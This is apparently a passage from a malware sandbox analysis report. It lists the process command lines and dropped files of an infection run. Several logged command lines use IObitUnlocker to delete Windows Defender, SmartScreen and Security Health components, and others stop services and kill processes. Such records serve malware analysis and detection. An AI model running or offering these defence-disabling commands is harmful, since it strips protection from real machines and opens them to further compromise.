Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2700"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "2700"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /newDiskSize

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5688"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "5688"

C:\Windows\SysWOW64\sc.exe

sc start VMTools

C:\Windows\SysWOW64\sc.exe

sc start VMTools

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

Network

Files

C:\Users\Admin\Desktop\jVtmykf5T.hta

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_heda3rju.tbx.ps1

C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE

C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe

C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe

C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe

C:\Temper\mSPVyMsH.exe

C:\Temper\pTLQnagR.exe

C:\Temper\BJwqsqOu.zip

C:\Temper\dHzrrTgp.exe

C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat

C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe

C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

C:\Users\Admin\AppData\Local\Temp\svcB90.tmp

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe

C:\Users\Admin\Desktop\v8uiRYqvH.hta

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\Work\DKT.zip

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.dll

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker.zip

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.sys

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FN8U7FPZ\service[1].htm
